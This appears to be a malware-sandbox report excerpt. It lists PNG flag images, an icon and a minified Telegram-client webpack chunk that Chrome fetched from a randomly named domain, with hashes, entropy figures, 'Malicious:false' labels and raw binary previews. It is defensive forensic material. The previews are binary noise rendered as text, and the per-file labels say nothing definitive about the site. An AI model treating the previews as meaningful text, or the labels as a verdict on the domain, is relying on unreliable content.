                                  Preview:.PNG........IHDR.....................PLTEGpLOZONWN8K8(C(ggg'C')F)eee-@,...9]9...nnnbbb*D*(D(ccc.--u..m...>>r99'D(eeen..$=%hhh9M9)E)hhh%A%eee]]])E)gggaaakkk&:%.J.kkk]]] < -J-.:.%A%..............................................................................................................................................................~...rr...s.sh.h}.}[.[[.[zzzZ.Z.XXY.YY.YX.XV.VuuuU.UT.TR.RU.U.IIqqqP.PN.NH.HL.LkkkN}NI.IhhhD.DH~H.AAI{I.::E|E.>>dddDzDHwH.;;CxC9}Aaaa.::GrGAvA.M<.88CrC>u?^^^.77>r>.22.55CmC<q<[[[.C7-w;.33:o:4r6.)0.22?j?XXX:m9.116n6aX5?g>7l7.//UUU6j6...sJ2.(*SSS2i3.--RRR.64.0/;a:.,,.?.4d4PPP.**9^9.!"NNNKKK.((1]16Y6.//m::HHHu44.&&#`$3T3.V.EEE1P1ABB*R*/M/.""T77.""===*I*:::x..&E&t..666!@!j..222R#.)33.;.---***)))(((&&&%%%$$$###"""!!! ...:..............................................G....tRNS...!08?KRTcccddfvx~~~.........................}.".....IDATx.....W....Y.tu.l....\....77....AP.H,..,.J.&!.....x@B.......-..&CH....HX...x...J.SUS.3=...A.U.tO.....w..v..,y..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3977
                                  Entropy (8bit):7.798239618187543
                                  Encrypted:false
                                  SSDEEP:96:hbxff0LNVueCDg4WTPKQ2SOcAQCYdwFHxBgHb:hdHc4gbKQ2S71Gy7
                                  MD5:934DA7C7C1EC30EE9E92ED392BD17CED
                                  SHA1:4CCEC57E8F6A19851DF4E1D589C0FABAAD49AA18
                                  SHA-256:161D4F9E853195BBC85BEFBC23949DEBDDED5B832B4733C72D4756352102230B
                                  SHA-512:01B4C4900FA92F5AF080CC05B70B743591D2D0B70EE7227BFD3C1012AA08DECA970E8B3DE14792ABB223173F8C8178F22A6FC0C53684911B1BFEA29384400132
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLaSF.oXRB#E(..c.r.jr.R,e...S-.f.dlb....#w.,.o?.r.U.c...hr..gu...4=.R,.rd...jr.T-.i.iq.X2b...H".sa...V/.m.kr.W0.t.K&.4>..`.....2..3../..8..7..7..6..5..2..6..7..3..C..7..2..A..1..K..0..6..T..,..,..H..Y..'..>..'..].....A..$..f.b..!.q.Q.h...#..A.2.!...j...#...C...V...$.../..e.3..F...O.:...3.M...._.?.%....O...#..N.."..M..&h.Q..(..!K.Y..!..!|.6S.G.hq[.1&.c&.c&.b$.b.bj#.a$.a#.`$._!.^.Zd .].._..f!.]..[#.Z.X`..Y?.5.NZ!.X..W..e..TL.Q.NW..Q..T.CQ..O..P..L.AL..L.6F..I..I..G..J.5C..J.BK.*;..D.':.":.(:.):.+;..F..A.'9.|G.2@..@.&7.}D..2..?.$5.%6. ;..=.#4..=.wB..<.#4.(6..<.!2.}>."2..0.r?.o?....x9..*..+. /..+.i;..'.q5..)..(..'..,.j5..%.a7..$..'..".d0..!.[3..!..)..%.. ....Y+.T-........!t.!.N&.......H"k..z..u..i..c..Q..]..>..-.........H......tRNS....,08;?@OS[`cccfltw{~............................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5724
                                  Entropy (8bit):7.955055002517372
                                  Encrypted:false
                                  SSDEEP:96:1mcHODziOctTGsjwkldifsFDAtj455hg9v7wd88qE2n9vLQWm4H97+4UhUMc+Dd:1mwUzi/Gql3FX55hg9TwULvsWm49yBUQ
                                  MD5:1A2F2A57AF8C2132A3A7FB4C48DB8A0D
                                  SHA1:CF88806F93C5CB31567E80B80A4892B0EA492D36
                                  SHA-256:82E8C7B01800111D6F06AD07B43FA1671AE8F581E2FCD5B0899F0460DDBD881D
                                  SHA-512:1A731EB70FC70F409A4DC9FE66E65474B30E5FC61EC059EB375DD511C6D552375BFD1C657BF0C27CC4D296823713FDB606ED4258BEF5DE440267F5E4B51A0E27
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f7-1f1f8.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.z{.rt.pq.ww.su~~~{{{.oq.KM.......)-+:bttt.uw....^`tuw......."L.oqvvv....uw.IKwww.ln...vvv.ru....vx.XZttt.ik.>H................................................................................................................&.........................................$...........!..g..............0....&........."..........;.......*.......1..........(..L..........qu.0....ss....ww..).`b.cm....qs.q2...w...hk.kn.dg.Yc.`b....q2.be.gi.NS.X\||{.\`.SX.^5.`blu..KP.OT.UWuuu.Y\.<;.DI.@E.SU.K6.FL.?D.KO.Q-dl..>C.=B.8?.?B.HM.9>.18.K[.6;.?A.7:.08.27.=B~Mq./4.66.'=.',H]..,1^T.DZ..05.+0.%,.).BX..,/@W.1\.@V...#.&+.'-.,1>T..$).18."';Q..$). %..6....S..)...$6M...!.....I3I.....&+....E./D~3Aw+B..F.f*J...)?}G3a->l'=z.?.%;x$:v*9c..."8v!7s.6r.4q....8z.2m|...+^."M."e3.(...&tRNS....)8;MTU]ccceflnz~~~........................IDATx.....W....3gf...{.f.M..&M....FKk. Z.J.........._..D......S..Jh.`+...i..&...M.s......q.......{......2..;..a.s.7n.q...7n.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4749
                                  Entropy (8bit):7.808226021119777
                                  Encrypted:false
                                  SSDEEP:96:2NX+jPqIOhm8FUY9FVxvJ1eUNSNs8avIRr2NDW2EbGSuy+XovJtPty5r07F:UIaUY9FXR1pNL8ay2NDW2CGS7+X6JtPL
                                  MD5:A2E719DCA76185E2226B03B8E2A78FBB
                                  SHA1:CF18AF91A4D3C7CC30C6F911A359F0335C56885E
                                  SHA-256:F3C0E6EC04C02777F242CD279E87FD7604A97ABA26380C0D7B7EB488F316DF51
                                  SHA-512:13B287DA531226AA6DA6580EDD1B84063A40314585BF27EFBB164DA828F49FD1F52D2C7865D74191A0B2AA35119FDBB773E5A670B6DF5BBEB6E820ACA04CF726
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1fc.png
                                  Preview:.PNG........IHDR.....................PLTEGpLd..2}.&r.b...^o\...\ng...^p.^og..X...]n....~..p.i...[m^...]o.j..h~.y.a...\nh..1...^pi..`...^o.Zlh..._q_..j...Xj.dw>..k...Ug\....9..8..6..!.....8..6..8..!..5..#..5..5..2..3..0..2..2.. ..1..1..0..G../........,..,.....+..Y.. ..)..'..9..f..B..x..W....x...k\.g..D..j..H..d..N..>..U..Z..7..&..a..&..Z../..&..+..%..>..F..$.....$..%..J..$.....%.....^..!.....!..#.....R..0..".....:...........#..E..R.................)..S..!..6........D...........!...........6..H........#........:.................$.................,.....A..............!....................................................................,..........................0..............................................................................{.....}..v..z..y..u..q..n..i|.m..l..ew.h~.i..ez.at.\o.Xk.Tf........tRNS......%*8;KLWWccceguy~~............................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4111
                                  Entropy (8bit):7.918760033871161
                                  Encrypted:false
                                  SSDEEP:96:dNJW00tko0eyqtzMOFF70b7jzRXvkLw3zbL9yMJ8:FWZtkAzl0/BgwXLH8
                                  MD5:CE2335F8A3CDF3824FB1571005AA1F21
                                  SHA1:4F2B1C7EF76884C5A0C7D29CC817944618A85273
                                  SHA-256:8059B90F702AA3280FDCA4527D1946794F548A1F38B19622FC746AB85C7FC31E
                                  SHA-512:E5846AA07F004AA340E03BE01E145C88A73E04111A78C0A9E84302E3C7D074836F7FDDCBB28E4031A3C11BA6F3581F5D2420BEAFB05F6F75B4B66A83AAD7C185
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1fe.png
                                  Preview:.PNG........IHDR.....................PLTEGpL3"$.iq....el.......nv....mu....CM.ow....... -.......Za.jr......IIIv......&1.lt....CK.ow....el....qy....ip....jr....rz.SZ....dl....<E...........................................................................................................................................................................................u.......b......{..........w..p{D...jv.qy....mu.ir,.y.bl.We.dn.]g.dl._h".s.Wbxxx.Yb..n.]e.P].S_.KX..k.Xa.ES.IV..f.MX.Q[.?N..cjjj.KU.:J.?M.CO.4E.6G.4D.3D.3D..[.2B.3C.DO.0B.7E.>J.0@..?.2A.->.6C..P.+<.,<[[[.):.5B.+;.'8.0>.&6. 2.$5.#3.'6.!2.*8QQQ..0../....!0..)..9..,."1..-..+..)..)III."/..%..'..*."...&..$..$....."..*.. ..!???...........&............~..333...w.....&&&%%%###""" ..........................................................+5....-tRNS....#"17CGSU`ccccjstx~~~~....................Y|......IDATx...[l..y...9g.;{.H.H.V..R.4Nl.. ..4m..@..E...._.>.1.-..m..m.@@....E...p..74P.(.e.,.6.E.u./{.9s..R..`...)f.?....r~...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3590
                                  Entropy (8bit):7.868367047443332
                                  Encrypted:false
                                  SSDEEP:96:ItbdQXa9Nzku6aRfDrfBJaJO0chA5CGcxcHVwyqI+n:gb+2zNDrfBJa0Ph4hq3n
                                  MD5:F4B6855F4229AC61CD68DB10F8F7E817
                                  SHA1:840410F98FC143E29F8DEF225C069DE522359D99
                                  SHA-256:3D9B2C0477BC7B4815DD11D68C0A5044FD327F6AED2139C35FB16D17B66F72B6
                                  SHA-512:DDEC78B5C0A79A5BA1147D2C29D8B351F4520F206BCD128F0ACCEB28E5E46DDD2AF60505BA3FD327A6A2F2E4BAF0631476AA06CA66D3C95C2BBACC71C11D3783
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e9-1f1ea.png
                                  Preview:.PNG........IHDR.....................PLTEGpLyi+kdJl_2uf1p^.ggg.j.we%XXXxa.......z......q.iii***PPP{d..t.bbb.>....V........t^..k.gggq[.lll<<<eeev`..m.dddRRRyc.iiiv_..m.___kkk.k.kkku^.]]].m...%..#..$..%.....&..%..$..$..$..#.."..!...........%..............!................ .... .............#............................................."......................v .............`!.u..............]..}..B!.O..x..x..t..q..p.jjj./..m..D..&&.%%.T..i.eee.#$.##."". |e.aaa.......0.^^^..%...xa....[[[."........&"...s\.XXX....."...SSS....'................OOO....&!............KKK........................FFF............BBB...." ...............<<<......777`##...r..222...---...D!!6&&***'''r..&&&%%%Z..$$$.%%""" 5......%%.........H....................0......................................Nc_....1tRNS....$.89IW^ccccfflnu~.~~~~.......................QjL^....IDATx.....iV...9.KeU..bkz4h....w...H.`..A.!....b1..!...a.....[.Hh....i..kFd.w.#3TY.t]lW......2.?./..-3555555555555
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4839
                                  Entropy (8bit):7.907389311814296
                                  Encrypted:false
                                  SSDEEP:96:OnYePFPpDf8IlPClRl+regvYgVSK63P1iE5JGs4az2va1w+m:W8EalfUegvbX63Pn5J/4azSa1pm
                                  MD5:BEABABBCB622C318C70F1AA0BB3C9367
                                  SHA1:D857ADA05DED33C2B30E46E94FF9D031C8EFDA1D
                                  SHA-256:A015783E42C00AFF91E42A8F736AC67DD4027BF4D2EAEC5F0AA3FC01914E4C35
                                  SHA-512:C7241560F7EF118F7088BB54A49CCB0634EB61A277E2741BF8742B6D5737C711258634B2EBB478009FAC596FC6CAB9CE67301D33CD4A2DD9F07D2071E626EFAE
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1ed.png
                                  Preview:.PNG........IHDR.....................PLTEGpLf..f{.]!5\s.g..h}.f..\s...+.7yf..j.._l.h.......}bx....h~.f..i..'D.ez.g..Ri.e{.l..g..aw.g..aw.k..Oe.c...................................................................................................X.....~....................o..(..........H..o.....^..&..... ....>...............W.$...........................z....x...S.kw......k...vx.}/e{..P^_v.Xt..LZ[q.So.Oo..09Rj.Gj..4F.4E.3E.2D.1Cu[].2CHd..0B>d../A.,;.&.Ac..0B.-?.,>C_..9\.As.->.*<6^..(:.,=7[..&8_I.<Y..Z.. 2.&7.#45V..)8.U.&V...#&U.. 2%T.$T...0#S..W..!1+R.#R.....'6.Y.!Q.#P..!1 O...,o;@.N..!0(M.f4q.. ..*..).L.."/.K...(,H..I..I...&.!...#.G...'.F.n'X..".D...+..!.D........E...%.A...*.@..?.....>..>.z.(.<..;..."K'b.;.....;....x."q.$.9..8..6v....6.))w.5.m...3.x...1../.f.....o...).`......%......tRNS....'+8DTbcbemw~~...............................................................................................................l.j3....IDATx...{.\W}...=..s.....w.y......4..BIiC.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3847
                                  Entropy (8bit):7.93118306808118
                                  Encrypted:false
                                  SSDEEP:96:3ns9d9G/RAzR/430IFqxmdTvYCS96SCLCpeR8:3nswpO/43bYCS9CL2eR8
                                  MD5:BA7C2DF18AB49C05647205B4B19F75D8
                                  SHA1:49F93D2C69DED7D214F546F2F521DFDF83F9319E
                                  SHA-256:1F5615547C2E2D81F51F917194B0D7D2A7916691E1A1BDEBEA8FE71A82DB2B7C
                                  SHA-512:4BAB07FF6AF66727F3F3324A1C258B56A32FC7912E3FC25A4BAF1B55047FD9242641960C753A1B13A3D952E5E2F06441DD8F5DFA265284105F9C246AF6DC244E
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..K..I;Mu."L.... K.&O!*S.#S..> -Y.%W]r...D.!K\q.ew../e.+[cw..7w.,W&%K..>.%S.>{Zo.=T.."O`|.$&K]q.Zp.J_.I].>R.?T...A.,^`u...Af}.Oj.FZ...D.1f #I.%Z`t.k..$7ho..hz."/ZSi.Pe.9O~.!Qs..g{.l~.Rg._r...W";o'?pGa.0J~@Z.36abu.6<fK`..2B.3C....1Az.+.2C.+;.0?....$.....?....&6.'7.!1.0A.6F.'4./>..*.4C.....U.+=....&.>M..K.GQ....)..c.*9.#3..,....'7..,..B. 1.:H.:I.......$YTx.....BN..(.7F..... ..!.............1i.DK.@K....)`..H....KU..........!2..#.KW......_)G,.D.hs...Xn....q{...v."........./a.%Q.Ub........!+A'K.B..cml$<.PYR"@.......Vc.........oh.L./.Yd.z..d..DO`..."+.K.......^x.!-....`l<W......}......|].4.;.-Ci9h......:c..*7...1\...#?Ep.",.2<.5B.!,..*..S..'.6C.FSB<p..$Fh.7I|Qq..%0..%60[kPs.BU.7K...&S..&1y.1.-;?j..;F..$.Rl^f.w.*.&8.<HDn.#.Qu\..)U.%2.Ob0)Rw3N>-T^^..HK....JtRNS....e..3....I.*.........!.O.x..`$...3......<.....2qY.E.?....se......&NX....lIDATx....[SW....0 B.l*..h...*.......M..I ...!.$4..@.([..d...V....V.6.......@c...|..h;.oI.3.}
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows icon resource - 3 icons, 32x32 with PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 48x48 with PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                  Category:dropped
                                  Size (bytes):2409
                                  Entropy (8bit):7.8337791782799115
                                  Encrypted:false
                                  SSDEEP:48:aZ3wanKjwC5o1Tt7WeBs0ThqaFfga5INLKr:2gdwC+1TEANq0fP6Wr
                                  MD5:1635ED0E8715C40D4BED875B7494A93A
                                  SHA1:CA2C72821B30194B9B6DAF9C8C0CE1723FE54614
                                  SHA-256:504B4621E486970F8C1721D5297561C9F33296F516C83FBB33A0FF3F4F7C1357
                                  SHA-512:F710268687FCD3DA9BD9FFEE9CBF166D21598CAB5FF1172C510FD478F57300AF7112F35132BA345A2242B65FF53CDE9DE6EBF0F1EA8CF7F5FCE17C832A5A85D8
                                  Malicious:false
                                  Reputation:low
                                  Preview:...... .... .1...6...00.... .d...g......... ..........PNG........IHDR... ... .....szz.....IDATx...'x.@...........x0.00.``.a........[....p.........~[eg....\9y.v..Yg..............iQ/!..<..v.R98;?.c.U..F.r6.#5......("7.E...Fp8..z.|..........N..9#..Kv.....4.~.b..|Nx..l}.F..../...\..Wj.....O...E.m~.f./....7".o.3...$7T.JM.J./....+X.w...].D.n.CAR..q...h.<..cr..j..[.\..5j4/...-...Y.H. .C..HS9..#s.....W..g-.Rp.I.mT.]~4...D:.<1'....i....B?Rd.7.w\..@|..aRn.F....k0T.H.'0I.......c.!_.Zt...+..Y<x\$....i].8..e.`.\....z.....n.mg.l...R.P..3..c.:.Z..b.......2fr..R.".y.x....tE......<1O..+l.<.xI.....KR.t9y...8O.B.J.1.+.,e..[.p.ux.T...f..n.O+1...x..[...X8.j..J._..y=.P@F@.../.Q- )...h....+.E)....O...Gf.<%../[...m....d..$..m......s....(.-...Zg.....:7...EL.r...Q..k..q.Q..r..k..9...Z..yF.K.{.F.5}.Z........#..Y.0u..kE....5ywr......IEND.B`..PNG........IHDR...0...0.....W......+IDATx..Y't.H..h..`Xzo.............{.....]..vm.(..]......M....}e.E/..3...G...G..-._....~
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (21340)
                                  Category:dropped
                                  Size (bytes):21477
                                  Entropy (8bit):5.653125035925863
                                  Encrypted:false
                                  SSDEEP:384:1AdJR5l17Hc+yWId88Q+0VL3oQ0LmVIkTzxr1QQ02NBTQ2tp2TLRX8tRiWyI:1AdJR7dHt8cVL3oQ0LeIkf502NBTQUYW
                                  MD5:A0980D43CEA486530C30F9F5E1C1B5E4
                                  SHA1:DEEC93F70F8B813B479137075AFA6A0A3A25B8BD
                                  SHA-256:4B5EEB1400E5118A1AFF286D9A6CF893BD7C08FC8247C62116238EA587890E9E
                                  SHA-512:9AC9939EFA609ACE82B5AED5157468098F6E0A25906BDBED44A4CE99FC822004B7C0A6EAD8D6DE6B148F7B8438EF9AAC944E0EC8B1FE0C4825EA9195D500AF00
                                  Malicious:false
                                  Reputation:low
                                  Preview:/*! For license information please see 7784.df07a876b22e3b2a83e9.js.LICENSE.txt */.(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[7784],{7784:function(e,t){!function(e){"use strict";var t=(e,t,i,n)=>{let a=65535&e,r=e>>>16&65535,s=0;for(;0!==i;){s=i>2e3?2e3:i,i-=s;do{a=a+t[n++]|0,r=r+a|0}while(--s);a%=65521,r%=65521}return a|r<<16};const i=new Uint32Array((()=>{let e,t=[];for(var i=0;i<256;i++){e=i;for(var n=0;n<8;n++)e=1&e?3988292384^e>>>1:e>>>1;t[i]=e}return t})());var n=(e,t,n,a)=>{const r=i,s=a+n;e^=-1;for(let i=a;i<s;i++)e=e>>>8^r[255&(e^t[i])];return~e};const a=16209;var r=function(e,t){let i,n,r,s,o,l,d,f,h,c,u,w,b,m,k,_,g,p,v,x,y,E,R,A;const Z=e.state;i=e.next_in,R=e.input,n=i+(e.avail_in-5),r=e.next_out,A=e.output,s=r-(t-e.avail_out),o=r+(e.avail_out-257),l=Z.dmax,d=Z.wsize,f=Z.whave,h=Z.wnext,c=Z.window,u=Z.hold,w=Z.bits,b=Z.lencode,m=Z.distcode,k=(1<<Z.lenbits)-1,_=(1<<Z.distbits)-1;e:do{w<15&&(u+=R[i++]<<w,w+=8,u+=R[i++]<<w,w+=8),g=b[u&k];t:for(;;){if(
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5307
                                  Entropy (8bit):7.918994636420094
                                  Encrypted:false
                                  SSDEEP:96:UnBXhV/+sX1/AvkdmX3kpeGf6QPWPp88wjJ78Kz+8y3rXyXZtrJJXcPH:UnDV/RXyZXUIGRGq4KzHy3rgZt7X8H
                                  MD5:8BC3EE67F533AC61E3C330D9E1F9F181
                                  SHA1:6BAC2637B0D352BDF516B76C14E4928AF01D2048
                                  SHA-256:B913B891677FC52EF5DC0F3BABDC6816F2D46555AA01D34681FFFEAC48D0980D
                                  SHA-512:616D38F51C2DC7B934C875614C9D481E8AB1E7C02EEBE1FF6CF03DD03C7ADADE65A0845051E0F0EC1BE7AEA2139DCBA5DECAB1BF9A9CF33264561E312B26D499
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLp.. 7[.1Ul...2Vu...0Sq..Ke..xw.57)Er....0Uj}.p.......!....1\m..<V}y...1Ut..m..`v..2Vt.../Tx..m...,P!8\x...1U.+OD].............................................................................................................................................wy.qs.ln.tuy...|{.cfx...^ak...egs...SW.SW.SV.XZ.RVn...RV.QU.QT.PSm..e...ORi...X[.NQ.SUi~..LO.JNa~..JN.LO.IL[{..HKcz..DH.FI.PS.EHUx..?C.CF_u.Wu..AD.^^.GJ.ADOt..:>.?B.>A.:=Wo.Pp.Hp..<?.59.=@.:=.>AHm.Cm..9=Pk..8<.48.GIBl.Kk..7:.7:@j..=?.<?.58./2Ch.>h.Kf..37.47.36<f..15.25Ad..15.*..03;c..049c...1.8<..26a..-0>`..(,.,0.-09_.5_..#'.,/3].6[.-\.1[..$'.57.*-..#/Y..474X.(X.-W.-V.0T..'+4S.)S.....#')Q."Q.&P.0N.'N.$N..$'*M.#L....!K.+Ix I..G.(Er.F..G.#E{. "....C...!%?i.?x.@..=o#:a.8k.7]....7..4Z.1_..T.(N.......ytRNS...!"48JTUccbdghz~~~~.....................................................................................................!WW....IDATx...{.\W}...=....7...M..@BH......J.V...UB".
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4586
                                  Entropy (8bit):7.91254454373437
                                  Encrypted:false
                                  SSDEEP:96:21UwGFFJbpV9AJ2LaRyt3k1Fx/7mjLCGp16Wxjmmy:+UwG1VV9AJ2ORyt3k1FxGLC4Timy
                                  MD5:906954BC15F0B43E4AE147813FBE198C
                                  SHA1:EECCA1A2AE787701B3475B58FA1C1F0BD50B52CE
                                  SHA-256:B138ABE5705548663A841F2C0709158CDCA3E261124874E908E5CA7A422E1D5C
                                  SHA-512:2B8ED20A3E70440D23F202A2E783891D0DE2EDA0AC93B1871694459D4F3F97E0308DCB5D6EC2B4C6E8FE113B8B44C1FA1ACBB42879869954E917D8FC1656CA2A
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL. Eiy.ar...C\m...Bgx.. E..Bdu...CEUf.. ..^hy.(>e..B^o..'O...;B1..Gbr...Bl}.bs.<Nu. Egw.Zk...Cj{...Car.. Fj{.. Ek|.]n...=2Jq..............(.....)../.. ..3........6..6..5..'..2......../..,.....*..)..:.....%.....&..$.....#.....!..A..............!.....>........#..............K.:.#..........L..#.....W.....3..!..[.....`......q..w.f...}.?iz.k~lev.ar.^o.Zo.^trkt=Zk.Uk.TluOg.Re.Hb.VgTLa.A].F`uF\.;Y.AX.E[\OZ:4T.8S.<R|<Ug1P..O.3N.*L.&K.&K.&J.%J.%J.%I.%I.$I.*H.#H.1J^#H.$G."G. F."F."E. E.(D{"D. D..C..B..B.(Bl.B..A..A.!@|.?..?..>}.=..>.+?L.=..<v.<..;..9p.9x.9~.9..7..7~.6h.6|.6y.6q.5v.4..4p.4z.4|.3y.2g.0..2y.2v.1w.0h.0q.0v./_./t..]..t.,..-n.-r.,s.+b.*U.+p.*o.*q.)o.)l.(a.'N.%..(k.(m.'l.%r.%k.$J.$T.%g.#v.$j.$i.#Z....#e.!a. F..o. \..M..T..}..g..B..S..v..K..G..b..>..:..[j......*tRNS.....%*8;JSWYccefgu{~~~....................y.f...oIDATx...[l..]...........N..d....I..K.T..H...4ZU.JA!.@..Z.*...h...P..ZQ.....%.y)..!...iJ....6...e...\X.g..{......kiv_F.3.6c
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (21340)
                                  Category:downloaded
                                  Size (bytes):21477
                                  Entropy (8bit):5.653125035925863
                                  Encrypted:false
                                  SSDEEP:384:1AdJR5l17Hc+yWId88Q+0VL3oQ0LmVIkTzxr1QQ02NBTQ2tp2TLRX8tRiWyI:1AdJR7dHt8cVL3oQ0LeIkf502NBTQUYW
                                  MD5:A0980D43CEA486530C30F9F5E1C1B5E4
                                  SHA1:DEEC93F70F8B813B479137075AFA6A0A3A25B8BD
                                  SHA-256:4B5EEB1400E5118A1AFF286D9A6CF893BD7C08FC8247C62116238EA587890E9E
                                  SHA-512:9AC9939EFA609ACE82B5AED5157468098F6E0A25906BDBED44A4CE99FC822004B7C0A6EAD8D6DE6B148F7B8438EF9AAC944E0EC8B1FE0C4825EA9195D500AF00
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/7784.df07a876b22e3b2a83e9.js
                                  Preview:/*! For license information please see 7784.df07a876b22e3b2a83e9.js.LICENSE.txt */.(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[7784],{7784:function(e,t){!function(e){"use strict";var t=(e,t,i,n)=>{let a=65535&e,r=e>>>16&65535,s=0;for(;0!==i;){s=i>2e3?2e3:i,i-=s;do{a=a+t[n++]|0,r=r+a|0}while(--s);a%=65521,r%=65521}return a|r<<16};const i=new Uint32Array((()=>{let e,t=[];for(var i=0;i<256;i++){e=i;for(var n=0;n<8;n++)e=1&e?3988292384^e>>>1:e>>>1;t[i]=e}return t})());var n=(e,t,n,a)=>{const r=i,s=a+n;e^=-1;for(let i=a;i<s;i++)e=e>>>8^r[255&(e^t[i])];return~e};const a=16209;var r=function(e,t){let i,n,r,s,o,l,d,f,h,c,u,w,b,m,k,_,g,p,v,x,y,E,R,A;const Z=e.state;i=e.next_in,R=e.input,n=i+(e.avail_in-5),r=e.next_out,A=e.output,s=r-(t-e.avail_out),o=r+(e.avail_out-257),l=Z.dmax,d=Z.wsize,f=Z.whave,h=Z.wnext,c=Z.window,u=Z.hold,w=Z.bits,b=Z.lencode,m=Z.distcode,k=(1<<Z.lenbits)-1,_=(1<<Z.distbits)-1;e:do{w<15&&(u+=R[i++]<<w,w+=8,u+=R[i++]<<w,w+=8),g=b[u&k];t:for(;;){if(
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5488
                                  Entropy (8bit):7.9368331260259914
                                  Encrypted:false
                                  SSDEEP:96:bGP8PhaIgz2bJHlQb6+kWdBN41IoRw1668QD34fimjThWK4u7Jqf3Jt8RM:aFI7ab6TONhhcDQkfXtWKQ/yM
                                  MD5:76445DEE727C69677E1C0B4478D3E72C
                                  SHA1:A23B4B341BB45522FA836D33C45EF8582D6D5CBA
                                  SHA-256:310C205968CA1ACC8B2825199DFCE7EFCFBE66B46BF7D1493BF44E1F46C37F01
                                  SHA-512:9C99B7340208236105D899C3CD8657D92D4391EFD054FF658877A3D1443806ECFF58A1068F5F78D09F4B1FF85B07694992F6EB4AFC16EEFBEBCF9DBED0A31986
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1ed.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..Tee...Q__...Ogg...R__......kii...O__...R...}..u....Tff.,,v..Nii...P^^...Qjj...Maa...P..Uii...P..J66}YY...............................................................||.||.vv.ss.oo.ii.jj.dd.__.aa.YY.TT.OO.HHjj..BBee..<<.;;``..55]]..44ZZ..//VV.TT..**.$..**.&&.#..%%QQ.OO..##.$'.!!.... II.JJ........#4....$=DD....DD..........CC.??........"J.......#W.........<<...-99.............r#i.........66..........33.55.......U%..................8..................--.......8$....w.G...**....((.--{...U.n...B..%%.$%.%%.......''.&&.$$.##."".....$....!!.%%~!!..$.......x.( .......................0.|...;.l.....w^.7...N.My..t................y..m...........f.....]9.V..}...*.i..p..W...........^.....r..{........e..V...........O..{..~..v..n..c..J..W..I.M....XtRNS....'49KUccegvx~~~~.....................................................................T.9.....IDATx..Y...y..:Km].L.&J.-.a.p..Nb'F. .A..,.r..........*W.r.......X.c.-.I....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4340
                                  Entropy (8bit):7.921573882667396
                                  Encrypted:false
                                  SSDEEP:96:wfFLqG30A1iORfLA8wPB8lvCLMpfO6Ln2EtN1ydDHsn214i+y5FHiFcM:0lQOcKlSMpGybL1Wrf4Fv
                                  MD5:7367CB7E732E707E07B863A7BE16DF83
                                  SHA1:F6225FB4458F82476872E6DB5A0C2093508FA746
                                  SHA-256:320E0222179BB2D8C0BC0A3E5055C129FF2D93A612539D61ECD01EAD64F33CC4
                                  SHA-512:25C5B6FBA48E99841906973EB5787AC459B045FF7B089F2ED56CD0528D4F0781CB1E5D30F2B7A8E2248914BA9990547FD113BF3BAE1AFBED659CB64F755678E4
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1f3.png
